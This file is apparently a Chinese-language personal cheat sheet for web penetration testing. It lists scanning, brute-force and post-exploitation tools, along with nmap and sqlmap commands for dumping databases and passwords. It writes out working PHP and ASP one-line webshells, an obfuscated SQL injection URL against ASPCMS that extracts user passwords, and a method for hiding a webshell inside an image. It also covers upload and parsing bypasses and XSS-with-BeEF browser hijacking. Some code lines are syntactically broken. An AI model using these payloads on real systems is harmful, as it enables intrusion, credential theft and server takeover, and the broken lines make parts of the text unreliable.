"""
常用工具
http代理:fiddler,burpsuite,mitmproxy
漏洞扫描:AWVS,Nmap
漏洞利用:SQLMap,metasploit,hydra(爆破)
抓包工具:wireshark,tcpdump
内网渗透:cobaltstrike,mimikatz(明文抓取window密码)
"""

# 一.信息收集
# 1.whois
kali whois
爱站工具网：whois.aizhan.com
站长之家:whois.chinaz.com
# 2.子域名
Layer子域名挖掘机
subDomainsBrute
#https://github.com/lijiejie/subDomainsBrute
Sublist3r
# https://codeload.github.com/aboul3la/Sublist3r/zip/master
# 3.端口扫描
Nmap  -T4 -A  -v ip
T4:时序(0-5)级别越高，速度越快,-A:使用进攻性方式扫描
nmap 192.168.1.7 -D 8.8.8.8 -ttl 12   # -D伪造地址，-ttl存活次数
nmap ip -p 21                   # 指定端口
nmap --traceroute 192.168.8.28  # 目标地址路由跟踪
nmap -sP 192.168.9.0/24         # 地址在线状况
nmap -O 192.168.9.27            # 目标地址操作系统
nmap -O -Pn 192.168.9.27        # 不使用ping的方式
nmap -sV 192.168.9.27           # 服务版本检测
# 实战中 利用FIN 扫描的方式探测防火墙的状态。 FIN扫描用于识别端口是否关闭，收到RST 回复说明该端口关闭，否则就是 open或filtered状态
nmap -sF -T4 192.168.9.99
nmap --script=常见脚本  ip
Masscan
ZMap
御剑高速TCP端口扫描工具

# 4.指纹识别
御剑Web指纹识别
WhatWeb https:/whatweb.net/

# 5.查找真实ip
www.ip138.com

# 6.网站目录扫描
DirBuster
御剑后台扫描珍藏版
wwwscan
kali:skipfish
kali:websploit
# 7.SQLMap,pangolin
注入漏洞产生条件:1.参数用户可控,2.
注入点类型判断:1.有无回显,2.注入点参数(数字型，字符型)

# 判断是否存在注入
sqlmap.py -u ” http://192.168.1.104/sqll/Less-1/?id=l&uid=2 ”  # 后面多个参数用""
sqlmap.py -u ” http://192.168.1.104/sqll/Less-1/?id=l&uid=2 ” --sql-shell # 后面多个参数用""
sqlmap.py -r   1.txt
#进入 sql-shell,使用 select load_file(/data/xx.file),读取源码文件
# 使用 into outfile file_path,写入文件
# 手动注入方式
1.id=1 and 1=1 或者 id=1 and 1=2  或者 or 1=1,or 1=2  # 判断返回结果是否相同
2.id=1 order by (1-99)        # 判断长度
3.
 使报错
 id=-1 union select 1,2,3...
 报错数上写函数,查看版本version(),查看用户user()
 id=-1 union select 1,version(),3,...

# 存在注入后,查询当前用户所有的数据库
sqlmap.py -u  http://192.168.1.104/sqll/Less 1/?id=1 --dbs
-D ans --tables
-D ans -T ans_user --columns
--users
--passwords

# md5、sha1等全球通用公开的加密算法进行反向查询
https://www.cmd5.com/
# 8. burpsuite

# 9.xss漏洞(Cross-Site Scripting 跨站脚本攻击)：反射型,存储型,DOM型


#10.文件上传漏洞
JS检测绕过:1.浏览器插件,删除检测文件后缀的JS代码,2.抓包,改成可执行文件后缀在上传


#11.WAF(软件型,硬件型,云WAF,网站系统内置WAF(系统中的内置过滤))

#12.相关漏洞的具体信息和共享(安全焦点:http://www.securityfocus.com/，Exploit-DB:http://www.exploit-db.com)

#中国蚁剑AntSword 连接webshell,Cknife 中国菜刀


"""
#下载热门字典
https://wiki.skullsecurity.org/index.php/Passwords
https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/

"""

# 一句话木马php
“<?php  @eval($_POST['cracer']; ?>


###########################cracer总结##################################
# 常见CMS
wordpress
docify 生成文档
dumi  生成文档
imgcook
ant design landing
one nac 导航网站
discu
discuq  论坛,素材下载，帖子站点
帝国cms和织梦cms

#ASPCMS 漏洞:
默认后台:
/admin_aspcms/login.asp
/admin/login.asp
/admin_login.asp
有限公司--Powered by ASPCMS 2.0

/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

<meta http-equiv="refresh" content="3;url=http://wwwbaidu.com">
4秒跳转到百度


#一句话木马:
asp:<%eval request("values") %>
php:<?php @eval($_POST[value];?>
客户端:中国菜刀,lanker一句话客户端

# 制作图片木马
c32：1.将一句话木马加入图片，2.上传到服务器,3.访问获得图片地址,4.用客户端连接
cmd:  copy /b 1.jpg+1.asp 2.jpg

iis解析漏洞：dir.asp/  filename.asp;.jpg
apache解析漏洞:cracer.php.owf
nginx畸形解析漏洞:

#文件上传漏洞
1.filepath配合解析漏洞
2.%00截断
3.filetype
4.双文件上传 # 上传两个文件:第一个正常图片，第二个为木马

#XSS常用的小工具
Hackbar
Live HTTP Headers

# 免费xss平台(或自己搭建xss利用平台)
xss 盗取cookie后，使用啊D注入工具利用
xss+beef劫持浏览器
xss+beef+msf劫持浏览器后，利用浏览器漏洞,msf生成meterpreter

# xss漏洞扫描
wvs,椰树web漏洞扫描,w3af